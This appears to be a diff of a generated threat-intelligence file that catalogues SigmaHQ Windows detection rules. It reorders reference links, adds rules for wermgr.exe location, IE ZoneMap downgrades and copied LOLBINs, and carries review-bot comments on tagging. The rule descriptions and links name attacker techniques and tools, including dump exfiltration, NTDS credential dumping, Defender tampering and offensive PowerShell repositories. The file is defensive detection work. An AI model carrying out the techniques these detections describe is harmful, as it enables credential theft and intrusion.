- "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/",
+ "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml"
 ],
@@ -73961,8 +75190,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon",
 "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
+ "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml"
 ],
 "tags": [
@@ -74044,8 +75273,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/",
+ "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml"
 ],
@@ -74146,24 +75375,24 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
 "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://adsecurity.org/?p=2921",
 "https://github.com/Kevin-Robertson/Powermad",
 "https://github.com/adrecon/AzureADRecon",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/adrecon/ADRecon",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
 "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
 "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
 "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
 "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml"
 ],
 "tags": [
@@ -74398,8 +75627,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
 "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml"
 ],
 "tags": [
@@ -74449,8 +75678,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe",
 "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
+ "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_stdin_redirect.yml"
 ],
 "tags": [
@@ -74483,8 +75712,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode",
 "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
+ "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml"
 ],
 "tags": [
@@ -74693,8 +75922,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/tccontre18/status/1480950986650832903",
- "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
 "https://twitter.com/mrd0x/status/1461041276514623491",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"
 ],
 "tags": [
@@ -74831,9 +76060,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
 "https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
- "https://lolbas-project.github.io/lolbas/Binaries/Psr/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"
 ],
 "tags": [
@@ -74868,8 +76097,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.poweradmin.com/paexec/",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.poweradmin.com/paexec/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml"
 ],
 "tags": [
@@ -75111,8 +76340,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
 "https://twitter.com/ShadowChasing1/status/1552595370961944576",
+ "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml"
 ],
 "tags": [
@@ -75178,9 +76407,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md",
 "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"
 ],
 "tags": [
@@ -75295,9 +76524,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
 "https://www.gpg4win.de/documentation.html",
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml"
 ],
 "tags": [
@@ -75320,8 +76549,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml"
@@ -75390,8 +76619,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://forensafe.com/blogs/typedpaths.html",
 "https://twitter.com/dez_/status/1560101453150257154",
+ "https://forensafe.com/blogs/typedpaths.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_typed_paths_persistence.yml"
 ],
 "tags": [
@@ -75447,9 +76676,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://emkc.org/s/RJjuLa",
 "https://www.mandiant.com/resources/blog/lnk-between-browsers",
 "https://redcanary.com/blog/chromeloader/",
+ "https://emkc.org/s/RJjuLa",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml"
 ],
 "tags": [
@@ -75516,9 +76745,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
 "https://github.com/jpillora/chisel/",
+ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
+ "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml"
 ],
 "tags": [
@@ -75585,11 +76814,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
+ "https://twitter.com/bohops/status/980659399495741441",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
 "https://twitter.com/JohnLaTwC/status/1223292479270600706",
- "https://twitter.com/bohops/status/980659399495741441",
 "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
+ "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml"
 ],
 "tags": [
@@ -75669,10 +76898,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
 "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
 "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html",
+ "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
 "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_susp_execution.yml"
 ],
@@ -75780,9 +77009,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml",
 "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp",
 "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
+ "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml"
 ],
 "tags": [
@@ -75815,9 +77044,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
 "https://twitter.com/pabraeken/status/993298228840992768",
 "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"
 ],
 "tags": [
@@ -75837,15 +77066,16 @@
 "value": "Malicious Windows Script Components File Execution by TAEF Detection"
 },
 {
- "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration",
+ "description": "Detects execution of 7z in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.",
 "meta": {
 "author": "Nasreddine Bencherchali (Nextron Systems)",
 "creation_date": "2022/09/27",
 "falsepositive": [
- "Unknown"
+ "Legitimate use of 7z with a command line in which \".dmp\" or \".dump\" appears accidentally",
+ "Legitimate use of 7z to compress WER \".dmp\" files for troubleshooting"
 ],
 "filename": "proc_creation_win_7zip_exfil_dmp_files.yml",
- "level": "high",
+ "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
@@ -75915,8 +77145,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
+ "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml"
 ],
 "tags": [
@@ -75960,6 +77190,31 @@
 "uuid": "9525dc73-0327-438c-8c04-13c0e037e9da",
 "value": "Regsvr32 Execution From Potential Suspicious Location"
 },
+ {
+ "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/10/14",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_wermgr_susp_exec_location.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/binderlabs/DirCreate2System",
+ "https://www.echotrail.io/insights/search/wermgr.exe",
+ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_exec_location.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5",
+ "value": "Suspicious Execution Location Of Wermgr.EXE"
+ },
 {
 "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name",
 "meta": {
@@ -76047,9 +77302,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms",
 "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
 "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit",
- "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csvde_export.yml"
 ],
 "tags": [
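Review bot: The new "Suspicious Execution Location Of Wermgr.EXE" entry carries only the tactic tag `"attack.execution"` and has no technique tag and no `related` array, whereas the sibling wermgr child-process entry updated in this same series links its techniques through `related`, so technique-to-rule pivots in the galaxy will never reach this entry. Running a system binary from a non-standard path is what ATT&CK files under Masquerading (presumably T1036.005, Match Legitimate Name or Location); if the upstream Sigma rule already carries such a tag the generator dropped it here, otherwise it is worth raising upstream rather than hand-editing this generated file. Either way the entry is valid as emitted; this is a coverage gap, not a syntax problem.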
@@ -76072,8 +77327,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"
 ],
@@ -76107,10 +77362,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/CyberRaiju/status/1273597319322058752",
 "https://twitter.com/bohops/status/1276357235954909188?s=12",
- "https://twitter.com/nas_bench/status/1535322450858233858",
 "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/",
+ "https://twitter.com/CyberRaiju/status/1273597319322058752",
+ "https://twitter.com/nas_bench/status/1535322450858233858",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"
 ],
 "tags": [
@@ -76350,8 +77605,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Oddvarmoe/status/985518877076541440",
 "https://lolbas-project.github.io/lolbas/Binaries/Print/",
+ "https://twitter.com/Oddvarmoe/status/985518877076541440",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"
 ],
 "tags": [
@@ -76418,8 +77673,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/windowsterminalprofile.html",
 "https://twitter.com/nas_bench/status/1550836225652686848",
+ "https://persistence-info.github.io/Data/windowsterminalprofile.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml"
 ],
 "tags": [
@@ -76586,12 +77841,12 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://pentestlab.blog/tag/ntds-dit/",
 "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
 "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
 "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://github.com/zcgonvh/NTDSDumpEx",
+ "https://pentestlab.blog/tag/ntds-dit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
 ],
 "tags": [
@@ -76750,6 +78005,33 @@
 "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7",
 "value": "PowerShell Download Pattern"
 },
+ {
+ "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/JAMESWT_MHT/status/1699042827261391247",
+ "https://twitter.com/M_haggis/status/1699056847154725107",
+ "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
+ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "10344bb3-7f65-46c2-b915-2d00d47be5b0",
+ "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI"
+ },
 {
 "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec",
 "meta": {
@@ -76801,7 +78083,8 @@
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml"
 ],
 "tags": [
- "attack.credential_access",
+ "attack.privilege_escalation",
+ "attack.persistence",
 "attack.t1546.008"
 ]
 },
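Review bot: The description string of the new IE ZoneMap entry ends in a literal escaped newline (`...as files stored locally.\n`), which none of the other description values in these hunks carry; this looks like the upstream rule's YAML block scalar passed through the generator without being stripped, and it will render as a stray line break wherever the cluster is displayed. Strip the text in the generator (e.g. the equivalent of `description.strip()`) rather than editing this generated file by hand, since the next regeneration would reintroduce it. Separately, the entry is tagged only with the tactics `"attack.execution"` and `"attack.defense_evasion"` and has no technique tag or `related` array, so unlike the other new entries in this change it cannot be reached from an ATT&CK technique; whether that is an upstream gap or a generator drop is not visible from the hunk.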
@@ -76962,8 +78245,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
 "https://lolbas-project.github.io/lolbas/Binaries/Replace/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"
 ],
 "tags": [
@@ -77029,8 +78312,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
 "https://github.com/med0x2e/vba2clr",
+ "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_parent.yml"
 ],
 "tags": [
@@ -77055,8 +78338,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/",
 "https://twitter.com/pabraeken/status/991335019833708544",
+ "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml"
 ],
 "tags": [
@@ -77125,11 +78408,58 @@
 "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.004"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c",
 "value": "Suspicious IIS Module Registration"
 },
+ {
+ "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/08/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_copy_system_dir_lolbin.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
+ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "f5d19838-41b5-476c-98d8-ba8af4929ee2",
+ "value": "LOL-Binary Copied From System Directory"
+ },
 {
 "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV",
 "meta": {
@@ -77144,8 +78474,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml"
 ],
 "tags": [
@@ -77181,8 +78511,29 @@
 "https://redcanary.com/blog/blackbyte-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1564",
+ "attack.t1059"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a",
 "value": "Parent in Public Folder Suspicious Process"
 },
@@ -77234,8 +78585,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/991670870384021504",
 "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml",
+ "https://twitter.com/harr0ey/status/991670870384021504",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml"
 ],
 "tags": [
@@ -77310,9 +78661,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0",
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar",
 "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
